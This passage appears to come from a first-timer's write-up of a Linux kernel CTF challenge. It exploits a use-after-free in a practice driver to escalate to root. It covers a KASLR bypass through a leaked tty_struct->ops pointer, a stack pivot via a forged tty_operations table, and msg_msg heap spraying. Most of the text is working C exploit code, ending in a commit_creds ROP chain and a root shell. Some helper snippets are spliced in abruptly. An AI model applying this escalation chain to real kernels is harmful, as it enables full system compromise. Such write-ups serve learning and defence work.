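    assert(m->next_id < MODEL_MAX_ALLOCS);
    m->live[m->next_id] = true;
    m->g_buf = m->next_id++;
}

/* Mirrors module_close(): frees what g_buf points at, never clears g_buf. */
static void model_close(struct driver_model *m)
{
    if (m->g_buf != MODEL_NULL) {
        m->live[m->g_buf] = false;
    }
}

/* True when g_buf still references an allocation that has been freed. */
static bool model_g_buf_dangling(const struct driver_model *m)
{
    return m->g_buf != MODEL_NULL && !m->live[m->g_buf];
}

/* Count allocations that are still live but no longer reachable via g_buf. */
static int model_leaked(const struct driver_model *m)
{
    int leaked = 0;
    for (int i = 0; i < m->next_id; i++) {
        if (m->live[i] && i != m->g_buf) {
            leaked++;
        }
    }
    return leaked;
}
```

After model_open(), model_open(), model_close(), the model reports a dangling g_buf and one leaked allocation, which matches the four steps listed above.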

static ssize_t module_read(struct file *file,
                           char __user *buf, size_t count,
                           loff_t *f_pos)
{
  printk(KERN_INFO "module_read called\n");

  if (count > BUFFER_SIZE) {
    printk(KERN_INFO "invalid buffer size\n");
    return -EINVAL;
  }

  if (copy_to_user(buf, g_buf, count)) {
    printk(KERN_INFO "copy_to_user failed\n");
    return -EINVAL;
  }

  return count;
}

static ssize_t module_write(struct file *file,
                            const char __user *buf, size_t count,
                            loff_t *f_pos)
{
  printk(KERN_INFO "module_write called\n");

  if (count > BUFFER_SIZE) {
    printk(KERN_INFO "invalid buffer size\n");
    return -EINVAL;
  }

  if (copy_from_user(g_buf, buf, count)) {
    printk(KERN_INFO "copy_from_user failed\n");
    return -EINVAL;
  }

  return count;
}

So with these methods, we are able to read and write to our freed object. This is great for us since we’re free to pretty much do anything we want. We are limited somewhat by the object size which is hardcoded in the code to 0x400.

At a high level, UAFs are generally exploited in two steps. First we create the UAF condition, so that we hold a reference to a freed object. Then we cause a different object to be allocated in the space our freed object used to occupy.

So if we allocated a g_buf of size 0x400 and then freed it, we need to place another object in its place. This new object would then be the target of our reads and writes.

KASLR Bypass

The first thing we need to do is bypass KASLR by leaking some address that is a known static offset from the kernel image base. I started searching for objects that have leakable members and again, @ptrYudai came to the rescue with a catalog of useful Linux Kernel data structures for exploitation. This led me to the tty_struct, which is allocated from the same slab cache as our 0x400 buffer, kmalloc-1024. The tty_struct has a field called ops, a pointer to a struct tty_operations function table that sits at a static offset from the kernel base. So if we can leak the value of tty_struct->ops we will have bypassed KASLR. This struct was used by NCCGROUP for the same purpose in their exploit of CVE-2022-32250.

It’s important to note that the slab cache we’re targeting is per-CPU. Luckily, the VM we’re given for the challenge only has one logical core so we don’t have to worry about CPU affinity for this exercise. On most systems with more than one core, we would have to worry about influencing one specific CPU’s cache.

So with our module_read ability, we will simply:

Free g_buf
Create tty_structs (by opening /dev/ptmx) until one hopefully fills the freed space where g_buf used to live
Call module_read to get a copy of g_buf, which is now actually our tty_struct, and then inspect the value of tty_struct->ops.

Here are some snippets of code related to that from the exploit:

// Leak a tty_struct->ops field which is constant offset from kernel base
uint64_t leak_ops(int fd) {
    if (fd < 0) {
        err("Bad fd given to `leak_ops()`");
    }

    /* tty_struct {
        int magic;      // 4 bytes
        struct kref;    // 4 bytes (single member is an int refcount_t)
        struct device *dev; // 8 bytes
        struct tty_driver *driver; // 8 bytes
        const struct tty_operations *ops; (offset 24 (or 0x18))
        ...
    } */

    // Read first 32 bytes of the structure
    unsigned char *ops_buf = calloc(1, 32);
    if (!ops_buf) {
        err("Failed to allocate ops_buf");
    }

    ssize_t bytes_read = read(fd, ops_buf, 32);
    if (bytes_read != (ssize_t)32) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    uint64_t ops = *(uint64_t *)&ops_buf[24];
    info("tty_struct->ops: 0x%lx", ops);

    // Solve for kernel base, keep the last 12 bits
    uint64_t test = ops & 0b111111111111;

    // These magic compares are for static offsets on this kernel
    if (test == 0xb40ULL) {
        return ops - 0xc39b40ULL;
    }

    else if (test == 0xc60ULL) {
        return ops - 0xc39c60ULL;
    }

    else {
        err("Got an unexpected tty_struct->ops ptr");
    }
}

There’s a confusing part about masking the leaked value down to its lower 12 bits, and that’s because I kept getting one of two values during multiple runs of the exploit within the same boot. This is probably because there are two kinds of tty_structs that can be allocated and they are allocated in pairs. The if/else if block just handles both cases and solves the kernel base for us. So at this point we have bypassed KASLR because we know the base address the kernel is loaded at.
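The base calculation can be isolated into a pure function that is easy to check off-target. The sketch below assumes the randomized kernel base is at least page-aligned, so the low 12 bits of a leaked pointer identify which of the two tables it points at. The two offsets are the ones from leak_ops() and only apply to this challenge kernel. kernel_base_from_ops() is a hypothetical helper name.

```c
#include <assert.h>
#include <stdint.h>

/* Offsets of the two ops tables from the kernel base, taken from leak_ops().
 * They are specific to this challenge kernel. */
#define OPS_OFF_A 0xc39b40ULL
#define OPS_OFF_B 0xc39c60ULL
#define LOW12(x)  ((x) & 0xfffULL)

/* Returns the kernel base, or 0 when the pointer matches neither table. */
static uint64_t kernel_base_from_ops(uint64_t ops)
{
    uint64_t base = 0;

    if (LOW12(ops) == LOW12(OPS_OFF_A)) {
        base = ops - OPS_OFF_A;
    } else if (LOW12(ops) == LOW12(OPS_OFF_B)) {
        base = ops - OPS_OFF_B;
    }

    /* Any base we compute this way is page-aligned by construction */
    assert(LOW12(base) == 0);
    return base;
}
```

Returning 0 instead of exiting lets the caller decide whether to retry the spray when an unexpected object landed in the freed slot.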

RIP Control

Next, we need some way to hijack execution. Luckily, we can use the same data structure, tty_struct: we can write to the object using module_write and overwrite the pointer value of tty_struct->ops.

struct tty_operations is a table of function pointers, and looks like this:

struct tty_struct * (*lookup)(struct tty_driver *driver,
			struct file *filp, int idx);
	int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
	void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
	int  (*open)(struct tty_struct * tty, struct file * filp);
	void (*close)(struct tty_struct * tty, struct file * filp);
	void (*shutdown)(struct tty_struct *tty);
	void (*cleanup)(struct tty_struct *tty);
	int  (*write)(struct tty_struct * tty,
		      const unsigned char *buf, int count);
	int  (*put_char)(struct tty_struct *tty, unsigned char ch);
	void (*flush_chars)(struct tty_struct *tty);
	unsigned int (*write_room)(struct tty_struct *tty);
	unsigned int (*chars_in_buffer)(struct tty_struct *tty);
	int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);
...SNIP...

These functions are invoked on the tty_struct when certain actions are performed on an instance of a tty_struct. For example, when the tty_struct’s controlling process exits, several of these functions are called in a row: close(), shutdown(), and cleanup().
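Because the table is just an array of 8-byte function pointers, each handler lives at a fixed slot. The sketch below derives the slot indices and byte offsets from the order in the listing above. The enum and helper names are hypothetical, and the order is an assumption that only holds for kernels whose struct tty_operations matches that listing.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Slot order copied from the listing above (assumed for this kernel only). */
enum tty_op_slot {
    SLOT_LOOKUP = 0,
    SLOT_INSTALL,
    SLOT_REMOVE,
    SLOT_OPEN,
    SLOT_CLOSE,
    SLOT_SHUTDOWN,
    SLOT_CLEANUP,
    SLOT_WRITE,
    SLOT_PUT_CHAR,
    SLOT_FLUSH_CHARS,
    SLOT_WRITE_ROOM,
    SLOT_CHARS_IN_BUFFER,
    SLOT_IOCTL,
    SLOT_COUNT /* number of slots covered by the listing */
};

/* Byte offset of a handler inside the table (8-byte pointers on x86-64). */
static size_t slot_offset(enum tty_op_slot slot)
{
    assert(slot < SLOT_COUNT);
    return (size_t)slot * sizeof(uint64_t);
}

/* Address of a handler's slot inside a table that starts at `table_addr`. */
static uint64_t slot_address(uint64_t table_addr, enum tty_op_slot slot)
{
    return table_addr + slot_offset(slot);
}
```

With this ordering, close(), shutdown(), and cleanup() sit at offsets 0x20, 0x28, and 0x30, and ioctl() sits at 0x60.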

So our plan will be to:

Create UAF condition
Occupy free’d memory with tty_struct
Read a copy of the tty_struct back to us in userland
Alter the tty->ops value to point to a faked function table that we control
Write the new data back to the tty_struct which is now corrupted
Do something to the tty_struct that causes a function we control to be invoked

PAWNYABLE tells us that a popular target is invoking ioctl() as the function takes several arguments which are user-controlled.

int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);

From userland, we can supply the values for cmd and arg. This gives us some flexibility. The value we can provide for cmd is somewhat limited as an unsigned int is only 4 bytes. arg gives us a full 8 bytes of control over RDX. Since we can control the contents of RDX whenever we invoke ioctl(), we need to find a gadget that pivots the stack to some memory in the kernel heap that we control. I found such a gadget here:

0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;

The gadget pushes the value in RDX onto the stack and then immediately pops it into RSP, so the stack now lives at whatever address we passed to ioctl() as arg. The pop rbp consumes the first 8 bytes there, and the final ret starts executing the ROP chain that follows. So the control flow will go something like:

Invoke ioctl() on our corrupted tty_struct
ioctl() has been overwritten by a stack-pivot gadget that places the location of our ROP chain into RSP
ioctl() returns execution to our ROP chain
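To make the register effects of the pivot gadget concrete, here is a tiny emulation of push rdx; pop rsp; pop rbp; ret over a fake memory array. It is only a sketch: struct cpu_model, struct mem_model, and run_pivot() are hypothetical names, the xor on eax is omitted because it does not touch the stack, and the addresses are made up. How the exploit's rop_addr accounts for the quadword consumed by pop rbp is not shown in the snippets in this post.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct cpu_model { uint64_t rsp, rbp, rip, rdx; };

/* Fake memory: `count` quadwords starting at byte address `base`. */
struct mem_model { uint64_t base; uint64_t *words; size_t count; };

/* Translate a fake byte address into a pointer to its backing quadword. */
static uint64_t *mem_at(struct mem_model *m, uint64_t addr)
{
    assert(m != NULL);
    assert(addr >= m->base && (addr - m->base) % 8 == 0);
    size_t idx = (size_t)((addr - m->base) / 8);
    assert(idx < m->count);
    return &m->words[idx];
}

/* Emulates: push rdx; pop rsp; pop rbp; ret */
static void run_pivot(struct cpu_model *c, struct mem_model *m)
{
    /* push rdx */
    c->rsp -= 8;
    *mem_at(m, c->rsp) = c->rdx;

    /* pop rsp: RSP now holds the value that was in RDX */
    c->rsp = *mem_at(m, c->rsp);

    /* pop rbp: consumes the first quadword at the new stack */
    c->rbp = *mem_at(m, c->rsp);
    c->rsp += 8;

    /* ret: the second quadword becomes the next instruction pointer */
    c->rip = *mem_at(m, c->rsp);
    c->rsp += 8;
}
```

In this model the first gadget that runs is the quadword at arg + 8, and RSP ends up at arg + 16, ready for the rest of the chain.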

So now we have a new problem, how do we create a fake function table and ROP chain in the kernel heap AND figure out where we stored them?

Creating/Locating a ROP Chain and Fake Function Table

This is where I started to diverge from the author’s exploitation strategy. I couldn’t quite follow along with the intended solution for this problem, so I began searching for other ways. With our extremely powerful read capability in mind, I remembered the msg_msg struct from @ptrYudai’s aforementioned structure catalog, and realized that the structure was perfect for our purposes as it:

Stores arbitrary data inline in the structure body (not via a pointer to the heap)
Contains a linked-list member that contains the addresses to prev and next messages within the same kernel message queue

So quickly, a strategy began to form. We could:

Create our ROP chain and fake function table in a buffer
Send the buffer as the body of a msg_msg struct
Use our module_read capability to read the msg_msg->m_list.next and msg_msg->m_list.prev values to know where in the heap at least two of our messages were stored
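The last step amounts to parsing the first bytes of the leaked object as a msg_msg header. The sketch below assumes the x86-64 layout in which the structure starts with the list pointers (next at offset 0, prev at offset 8) followed by the message type at offset 16, and it uses the 0x1337 type from the exploit as a sanity check. struct msg_leak and parse_msg_leak() are hypothetical names.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed header layout of struct msg_msg on x86-64 */
#define MSG_NEXT_OFF    0       /* m_list.next */
#define MSG_PREV_OFF    8       /* m_list.prev */
#define MSG_TYPE_OFF    16      /* m_type */
#define MSG_TYPE_MARKER 0x1337  /* mtype used when spraying */

struct msg_leak {
    uint64_t next; /* address of the next message in the queue */
    uint64_t prev; /* address of the previous message in the queue */
};

/* Load a native-endian u64 without alignment or aliasing problems. */
static uint64_t load_u64(const unsigned char *p)
{
    uint64_t v;
    memcpy(&v, p, sizeof(v));
    return v;
}

/* Returns true and fills `out` only if the bytes look like our msg_msg. */
static bool parse_msg_leak(const unsigned char *buf, size_t len,
                           struct msg_leak *out)
{
    assert(buf != NULL && out != NULL);

    if (len < MSG_TYPE_OFF + sizeof(uint64_t)) {
        return false;
    }
    if (load_u64(buf + MSG_TYPE_OFF) != MSG_TYPE_MARKER) {
        return false;
    }

    out->next = load_u64(buf + MSG_NEXT_OFF);
    out->prev = load_u64(buf + MSG_PREV_OFF);
    return true;
}
```

A caller would pass the buffer returned by module_read and treat a false result as a sign that some other object reclaimed the slot.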

With this ability, we would know exactly what address to supply as an argument to ioctl() when we invoke it in order to pivot the stack into our ROP chain. Here is some code related to that from the exploit:

// Allocate one msg_msg on the heap
size_t send_message() {
    // Calculate current queue
    if (num_queue < 1) {
        err("`send_message()` called with no message queues");
    }
    int curr_q = msg_queue[num_queue - 1];

    // Send message
    size_t fails = 0;
    struct msgbuf {
        long mtype;
        char mtext[MSG_SZ];
    } msg;

    // Unique identifier we can use
    msg.mtype = 0x1337;

    // Construct the ROP chain
    memset(msg.mtext, 0, MSG_SZ);

    // Pattern for offsets (debugging)
    uint64_t base = 0x41;
    uint64_t *curr = (uint64_t *)&msg.mtext[0];
    for (size_t i = 0; i < 25; i++) {
        uint64_t fill = base << 56;
        fill |= base << 48;
        fill |= base << 40;
        fill |= base << 32;
        fill |= base << 24;
        fill |= base << 16;
        fill |= base << 8;
        fill |= base;
        
        *curr++ = fill;
        base++; 
    }

    // ROP chain
    uint64_t *rop = (uint64_t *)&msg.mtext[0];
    *rop++ = pop_rdi; 
    *rop++ = 0x0;
    *rop++ = prepare_kernel_cred; // RAX now holds ptr to new creds
    *rop++ = xchg_rdi_rax; // Place creds into RDI 
    *rop++ = commit_creds; // Now we have super powers
    *rop++ = kpti_tramp;
    *rop++ = 0x0; // pop rax inside kpti_tramp
    *rop++ = 0x0; // pop rdi inside kpti_tramp
    *rop++ = (uint64_t)pop_shell; // Return here
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop   = user_ss;

    /* struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int  (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int  (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int  (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        unsigned int (*write_room)(struct tty_struct *tty);
        unsigned int (*chars_in_buffer)(struct tty_struct *tty);
        int  (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
        ...
    } */

    // Populate the 12 function pointers in the table that we have created.
    // There are 3 handlers that are invoked for allocated tty_structs when 
    // their controlling process exits, they are close(), shutdown(),
    // and cleanup(). We have to overwrite these pointers for when we exit our
    // exploit process or else the kernel will panic with a RIP of 
    // 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget
    uint64_t *func_table = (uint64_t *)&msg.mtext[rop_len];
    for (size_t i = 0; i < 12; i++) {
        // If i == 4, we're on the close() handler, set to ret gadget
        if (i == 4) { *func_table++ = ret; continue; }

        // If i == 5, we're on the shutdown() handler, set to ret gadget
        if (i == 5) { *func_table++ = ret; continue; }

        // If i == 6, we're on the cleanup() handler, set to ret gadget
        if (i == 6) { *func_table++ = ret; continue; }

        // Magic value for debugging
        *func_table++ = 0xdeadbeefdeadbe00 + i;
    }

    // Put our gadget address as the ioctl() handler to pivot stack
    *func_table = push_rdx;

    // Spray msg_msg's on the heap
    if (msgsnd(curr_q, &msg, MSG_SZ, IPC_NOWAIT) == -1) {
        fails++;
    }

    return fails;
}

I got a bit wordy with the comments in this block, but it’s for good reason. I didn’t want the exploit to ruin the kernel state; I wanted to exit cleanly. This presented a problem as we are completely hijacking the ops function table which the kernel will use to clean up our tty_struct. So I found a gadget that simply performs a ret operation, and overwrote the function pointers for close(), shutdown(), and cleanup() so that when they are invoked, they simply return. The kernel is apparently fine with this and doesn’t panic.

So our message body looks something like: <----ROP----Faked Function Table---->
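Given that layout, the kernel addresses of both pieces follow from the address of the message itself. The sketch below assumes a 0x30-byte msg_msg header in front of the body (the x86-64 size of the list pointers, type, size, next-segment pointer, and security pointer) and a 13-slot table ending at ioctl(). struct payload_addrs, locate_payload(), and payload_fits() are hypothetical names, and the ROP length is whatever the exploit's rop_len is.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define MSG_HDR_SZ  0x30u /* assumed sizeof(struct msg_msg) on x86-64 */
#define TABLE_SLOTS 13u   /* lookup() through ioctl() */
#define IOCTL_SLOT  12u   /* index of ioctl() in the table */

struct payload_addrs {
    uint64_t rop;        /* start of the message body and the ROP chain */
    uint64_t table;      /* start of the fake function table */
    uint64_t ioctl_slot; /* slot that holds the stack-pivot gadget */
};

/* Does a ROP chain of `rop_len` bytes plus the table fit in one message? */
static bool payload_fits(size_t rop_len, size_t msg_sz)
{
    return rop_len + TABLE_SLOTS * sizeof(uint64_t) <= msg_sz;
}

/* Compute where each part of the body lives, given the msg_msg address. */
static struct payload_addrs locate_payload(uint64_t msg_addr, size_t rop_len)
{
    assert(rop_len % sizeof(uint64_t) == 0);

    struct payload_addrs p;
    p.rop = msg_addr + MSG_HDR_SZ;
    p.table = p.rop + rop_len;
    p.ioctl_slot = p.table + IOCTL_SLOT * sizeof(uint64_t);
    return p;
}
```

The table address is the value that would be written over tty_struct->ops, while the ROP address is what the stack pivot needs to reach.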

Here is the code I used to overwrite the tty_struct->ops pointer:

void overwrite_ops(int fd) {
    unsigned char g_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, g_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    // Overwrite the tty_struct->ops pointer with ROP address
    *(uint64_t *)&g_buf[24] = fake_table;
    ssize_t bytes_written = write(fd, g_buf, GBUF_SZ);
    if (bytes_written != (ssize_t)GBUF_SZ) {
        err("Failed to write enough bytes to fd: %d", fd);
    }
}

So now that we know where our ROP chain is, and where our faked function table is, and we have the perfect stack pivot gadget, the rest of this process is simply building a real ROP chain which I will leave out of this post.

As a first timer, this tiny bit of creativity to leverage the read ability to leak the addresses of msg_msg structs was enough to get me hooked. Here is a picture of the exploit in action:

Miscellaneous

There were some things I tried to do to increase the exploit’s reliability.

One was to check the magic value in the leaked tty_structs to make sure a tty_struct had actually filled our freed memory and not another object. This is extremely convenient! All tty_structs have 0x5401 at tty->magic.

Another thing I did was spray msg_msg structs with an easily recognizable message type of 0x1337. This way when leaked, I could easily verify I was in fact leaking msg_msg contents and not some other arbitrary data structure. Another thing you could do would be to make sure supposed kernel addresses start with 0xffff.

Finally, there was the patching of the clean-up-related function pointers in tty->ops.
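The pointer sanity check mentioned above could look something like the sketch below. The helper name looks_like_kernel_ptr() is hypothetical, and the check assumes x86-64 with 4-level paging, where kernel-half addresses have their top 16 bits set. It is only a heuristic: it rules out obvious garbage, it does not prove a value is a valid pointer.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical helper: true if the top 16 bits are all ones, which is what
 * we expect from kernel addresses on x86-64 with 4-level paging */
static bool looks_like_kernel_ptr(uint64_t addr) {
    return (addr >> 48) == 0xffffULL;
}
```

A check like this would slot in next to the m_type comparison when validating the leaked next and prev pointers.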

Exploit Code

// One liner to add exploit to filesystem
// gcc exploit.c -o exploit -static && cp exploit rootfs && cd rootfs && find . -print0 | cpio -o --format=newc --null --owner=root > ../rootfs.cpio && cd ../

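#include <stdio.h> /* printf */
#include <sys/types.h> /* open */
#include <sys/stat.h> /* open */
#include <fcntl.h> /* open */
#include <stdlib.h> /* exit */
#include <stdint.h> /* int_t's */
#include <unistd.h> /* getuid */
#include <string.h> /* memset */
#include <sys/ipc.h> /* msg_msg */
#include <sys/msg.h> /* msg_msg */
#include <sys/ioctl.h> /* ioctl */
#include <stdarg.h> /* va_args */
#include <stdbool.h> /* true, false */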

#define DEV "/dev/holstein"
#define PTMX "/dev/ptmx"

#define PTMX_SPRAY (size_t)50       // Number of terminals to allocate
#define MSG_SPRAY (size_t)32        // Number of msg_msg's per queue
#define NUM_QUEUE (size_t)4         // Number of msg queues
#define MSG_SZ (size_t)512          // Size of each msg_msg, modulo 8 == 0
#define GBUF_SZ (size_t)0x400       // Size of g_buf in driver

// User state globals
uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rflags;
uint64_t user_sp;

// Mutable globals, when in Rome
uint64_t base;
uint64_t rop_addr;
uint64_t fake_table;
uint64_t ioctl_ptr;
int open_ptmx[PTMX_SPRAY] = { 0 };          // Store fds for clean up/ioctl()
int num_ptmx = 0;                           // Number of open fds
int msg_queue[NUM_QUEUE] = { 0 };           // Initialized message queues
int num_queue = 0;

// Misc constants. 
const uint64_t rop_len = 200;
const uint64_t ioctl_off = 12 * sizeof(uint64_t);

// Gadgets
// 0x723c0: commit_creds
uint64_t commit_creds;
// 0x72560: prepare_kernel_cred
uint64_t prepare_kernel_cred;
// 0x800e10: swapgs_restore_regs_and_return_to_usermode
uint64_t kpti_tramp;
// 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret; (stack pivot)
uint64_t push_rdx;
// 0x35738d: pop rdi; ret;
uint64_t pop_rdi;
// 0x487980: xchg rdi, rax; sar bh, 0x89; ret;
uint64_t xchg_rdi_rax;
// 0x32afea: ret;
uint64_t ret;

void err(const char* format, ...) {
    if (!format) {
        exit(-1);
    }

    fprintf(stderr, "%s", "[!] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
    exit(-1);
}

void info(const char* format, ...) {
    if (!format) {
        return;
    }
    
    fprintf(stderr, "%s", "[*] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
}

void save_state(void) {
    __asm__(
        ".intel_syntax noprefix;"   
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        // Push CPU flags onto stack
        "pushf;"
        // Pop CPU flags into var
        "pop user_rflags;"
        ".att_syntax;"
    );
}

// Should spawn a root shell
void pop_shell(void) {
    uid_t uid = getuid();
    if (uid != 0) {
        err("We are not root, wtf?");
    }

    info("We got root, spawning shell!");
    system("/bin/sh");
    exit(0);
}

// Open a char device, just exit on error, this is exploit code
int open_device(char *dev, int flags) {
    int fd = -1;
    if (!dev) {
        err("NULL ptr given to `open_device()`");
    }

    fd = open(dev, flags);
    if (fd < 0) {
        err("Failed to open '%s'", dev);
    }

    return fd;
}

// Spray kmalloc-1024 sized '/dev/ptmx' structures on the kernel heap
void alloc_ptmx() {
    int fd = open("/dev/ptmx", O_RDONLY | O_NOCTTY);
    if (fd < 0) {
        err("Failed to open /dev/ptmx");
    }

    open_ptmx[num_ptmx] = fd;
    num_ptmx++;
}

// Check to see if we have a reference to a tty_struct by reading in the magic
// number for the current allocation in our slab
bool found_ptmx(int fd) {
    unsigned char magic_buf[4];
    if (fd < 0) {
        err("Bad fd given to `found_ptmx()`\n");
    }

    ssize_t bytes_read = read(fd, magic_buf, 4);
    if (bytes_read != (ssize_t)4) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    if (*(int32_t *)magic_buf != 0x5401) {
        return false;
    }

    return true;
}

// Leak a tty_struct->ops field which is constant offset from kernel base
uint64_t leak_ops(int fd) {
    if (fd < 0) {
        err("Bad fd given to `leak_ops()`");
    }

    /* tty_struct {
        int magic;      // 4 bytes
        struct kref;    // 4 bytes (single member is an int refcount_t)
        struct device *dev; // 8 bytes
        struct tty_driver *driver; // 8 bytes
        const struct tty_operations *ops; (offset 24 (or 0x18))
        ...
    } */

    // Read first 32 bytes of the structure
    unsigned char *ops_buf = calloc(1, 32);
    if (!ops_buf) {
        err("Failed to allocate ops_buf");
    }

    ssize_t bytes_read = read(fd, ops_buf, 32);
    if (bytes_read != (ssize_t)32) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    uint64_t ops = *(uint64_t *)&ops_buf[24];
    info("tty_struct->ops: 0x%lx", ops);

    // Solve for kernel base, keep the last 12 bits
    uint64_t test = ops & 0b111111111111;

    // These magic compares are for static offsets on this kernel
    if (test == 0xb40ULL) {
        return ops - 0xc39b40ULL;
    }

    else if (test == 0xc60ULL) {
        return ops - 0xc39c60ULL;
    }

    else {
        err("Got an unexpected tty_struct->ops ptr");
    }
}

void solve_gadgets(void) {
    // 0x723c0: commit_creds
    commit_creds = base + 0x723c0ULL;
    printf("    >> commit_creds located @ 0x%lx\n", commit_creds);

    // 0x72560: prepare_kernel_cred
    prepare_kernel_cred = base + 0x72560ULL;
    printf("    >> prepare_kernel_cred located @ 0x%lx\n", prepare_kernel_cred);

    // 0x800e10: swapgs_restore_regs_and_return_to_usermode
    kpti_tramp = base + 0x800e10ULL + 22; // 22 offset, avoid pops
    printf("    >> kpti_tramp located @ 0x%lx\n", kpti_tramp);

    // 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;
    push_rdx = base + 0x14fbeaULL;
    printf("    >> push_rdx located @ 0x%lx\n", push_rdx);

    // 0x35738d: pop rdi; ret;
    pop_rdi = base + 0x35738dULL;
    printf("    >> pop_rdi located @ 0x%lx\n", pop_rdi);

    // 0x487980: xchg rdi, rax; sar bh, 0x89; ret;
    xchg_rdi_rax = base + 0x487980ULL;
    printf("    >> xchg_rdi_rax located @ 0x%lx\n", xchg_rdi_rax);

    // 0x32afea: ret;
    ret = base + 0x32afeaULL;
    printf("    >> ret located @ 0x%lx\n", ret);
}

// Initialize a kernel message queue
int init_msg_q(void) {
    int msg_qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    if (msg_qid == -1) {
        err("`msgget()` failed to initialize queue");
    }

    msg_queue[num_queue] = msg_qid;
    num_queue++;

    return msg_qid;
}

// Allocate one msg_msg on the heap
size_t send_message() {
    // Calculate current queue
    if (num_queue < 1) {
        err("`send_message()` called with no message queues");
    }
    int curr_q = msg_queue[num_queue - 1];

    // Send message
    size_t fails = 0;
    struct msgbuf {
        long mtype;
        char mtext[MSG_SZ];
    } msg;

    // Unique identifier we can use
    msg.mtype = 0x1337;

    // Construct the ROP chain
    memset(msg.mtext, 0, MSG_SZ);

    // Pattern for offsets (debugging)
    uint64_t base = 0x41;
    uint64_t *curr = (uint64_t *)&msg.mtext[0];
    for (size_t i = 0; i < 25; i++) {
        uint64_t fill = base << 56;
        fill |= base << 48;
        fill |= base << 40;
        fill |= base << 32;
        fill |= base << 24;
        fill |= base << 16;
        fill |= base << 8;
        fill |= base;
        
        *curr++ = fill;
        base++; 
    }

    // ROP chain
    uint64_t *rop = (uint64_t *)&msg.mtext[0];
    *rop++ = pop_rdi; 
    *rop++ = 0x0;
    *rop++ = prepare_kernel_cred; // RAX now holds ptr to new creds
    *rop++ = xchg_rdi_rax; // Place creds into RDI 
    *rop++ = commit_creds; // Now we have super powers
    *rop++ = kpti_tramp;
    *rop++ = 0x0; // pop rax inside kpti_tramp
    *rop++ = 0x0; // pop rdi inside kpti_tramp
    *rop++ = (uint64_t)pop_shell; // Return here
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop   = user_ss;

    /* struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int  (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int  (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int  (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        unsigned int (*write_room)(struct tty_struct *tty);
        unsigned int (*chars_in_buffer)(struct tty_struct *tty);
        int  (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
        ...
    } */

    // Populate the 12 function pointers in the table that we have created.
    // There are 3 handlers that are invoked for allocated tty_structs when 
    // their controlling process exits, they are close(), shutdown(),
    // and cleanup(). We have to overwrite these pointers for when we exit our
    // exploit process or else the kernel will panic with a RIP of 
    // 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget
    uint64_t *func_table = (uint64_t *)&msg.mtext[rop_len];
    for (size_t i = 0; i < 12; i++) {
        // If i == 4, we're on the close() handler, set to ret gadget
        if (i == 4) { *func_table++ = ret; continue; }

        // If i == 5, we're on the shutdown() handler, set to ret gadget
        if (i == 5) { *func_table++ = ret; continue; }

        // If i == 6, we're on the cleanup() handler, set to ret gadget
        if (i == 6) { *func_table++ = ret; continue; }

        // Magic value for debugging
        *func_table++ = 0xdeadbeefdeadbe00 + i;
    }

    // Put our gadget address as the ioctl() handler to pivot stack
    *func_table = push_rdx;

    // Spray msg_msg's on the heap
    if (msgsnd(curr_q, &msg, MSG_SZ, IPC_NOWAIT) == -1) {
        fails++;
    }

    return fails;
}

// Check to see if we have a reference to one of our msg_msg structs
bool found_msg(int fd) {
    // Read out the msg_msg
    unsigned char msg_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, msg_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read from holstein");
    }

    /* msg_msg {
        struct list_head m_list {
            struct list_head *next, *prev;
        } // 16 bytes
        long m_type; // 8 bytes
